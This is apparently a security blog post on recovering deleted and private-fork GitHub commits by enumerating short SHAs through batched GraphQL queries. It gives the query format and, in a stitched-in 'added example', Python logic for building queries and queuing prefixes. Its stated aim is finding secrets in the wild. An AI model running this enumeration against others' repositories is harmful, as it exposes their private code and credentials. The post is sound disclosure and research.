CFOR Exploit - Recovering Deleted and Private GitHub Commits
CFOR stands for Cross Fork Object Reference. It is an information disclosure vulnerability in which deleted commits, or commits from private forks, can still be retrieved from a repository if you know the commit hash; it is similar to an IDOR. The details of the flaw are in this blog post by TruffleSecurity, who discovered the issue.
After reading that blog post I started writing an exploit script for it to try and find secrets/keys in the wild for bug bounty programs. The biggest problem with exploiting this is the number of requests needed to enumerate all the commits by trying every possible short SHA. This makes it very tedious to exploit, taking 12 hours or more to enumerate the commits of a single repo. Because of this I spent some time reading through the GitHub API docs looking for an endpoint that accepts more than one commit ID per request and supports short SHAs. I soon realised that the GitHub GraphQL API is ideal for this, as I can form the query myself and do not have to rely on a REST API endpoint existing. This is the query format I settled on:
query {
  repository(owner:"repo_owner", name:"repo_name") {
    a1: object(expression:"0000") { ... on Commit { oid } }
    a2: object(expression:"0001") { ... on Commit { oid } }
  }
}
This enables testing thousands of commit IDs per request, which is a huge improvement over the original technique. From some initial testing I found that putting too many commits in a single query led to instability, and that ~400 per query was relatively consistent.
To make the exploit script more effective it first collects the repo's known commits. If a tested prefix collides with a commit that already exists we do not need to extract the data from that commit, but we still want to test the prefix, since other commits may share it, so the script adds that short SHA extended by one more character to the queue.
With this improved technique a repo's commit IDs could be discovered and downloaded in about 20 minutes, a significant improvement over the initial strategy.
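The query builder and prefix-queue logic described above, as an added example in Python that is not the author's script: it builds the aliased GraphQL query, splits prefixes into batches of ~400, and works out from a response which prefixes need another hex character. The `p_<prefix>` alias scheme, the rule of extending every prefix that resolves to an object, and the sample response are my assumptions; it makes no network requests, so it can be dropped into a self-audit of repositories you own.

```python
import string

HEX = string.hexdigits[:16].lower()  # "0123456789abcdef"
BATCH_SIZE = 400  # per-query size the post found to be stable


def build_query(owner, name, prefixes):
    """Build one GraphQL query that resolves many short SHAs at once.
    Each prefix gets an alias (p_<prefix>, an assumed scheme) so the
    response can be mapped back to the prefix that produced it."""
    fields = "\n".join(
        f'    p_{p}: object(expression:"{p}") {{ ... on Commit {{ oid }} }}'
        for p in prefixes
    )
    return (
        "query {\n"
        f'  repository(owner:"{owner}", name:"{name}") {{\n'
        f"{fields}\n"
        "  }\n"
        "}"
    )


def batches(prefixes, size=BATCH_SIZE):
    """Split the prefix queue into chunks small enough for one query."""
    prefixes = list(prefixes)
    return [prefixes[i:i + size] for i in range(0, len(prefixes), size)]


def process_response(response, known_oids):
    """Sort a decoded GraphQL response into newly discovered commits and
    prefixes that must be re-queued one character longer.
    known_oids: full SHAs already visible through the normal repo listing;
    it is updated in place so later batches do not re-report a commit."""
    discovered, to_extend = [], []
    for alias, obj in response["data"]["repository"].items():
        prefix = alias[len("p_"):]
        if obj is None:            # nothing has this prefix: drop it
            continue
        oid = obj["oid"]
        if oid not in known_oids:  # not in the listing: worth fetching
            discovered.append(oid)
            known_oids.add(oid)
        # Known or not, another commit could share the prefix (assumed
        # rule), so queue the 16 one-character extensions.
        to_extend.extend(prefix + c for c in HEX)
    return discovered, to_extend


# Constructed sample: one dead prefix, one known commit, one hidden commit.
SAMPLE_KNOWN = {"0001" + "a" * 36}
SAMPLE_RESPONSE = {"data": {"repository": {
    "p_0000": None,
    "p_0001": {"oid": "0001" + "a" * 36},
    "p_0002": {"oid": "0002" + "b" * 36},
}}}
```

Running `process_response(SAMPLE_RESPONSE, set(SAMPLE_KNOWN))` reports only the `0002...` commit as new and queues 32 five-character prefixes, none starting with `0000`.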
The exploit script is available here: https://github.com/SorceryIE/cfor_exploit
After developing this approach I reached out to TruffleSecurity on the 28th of July through their contact form to see if they would be interested in paying for the details. I received no response, but it seems that by the 31st of July they had figured out the technique and implemented it in TruffleHog, their secrets scanning tool. On August 2nd they released a follow-up blog post detailing this approach here.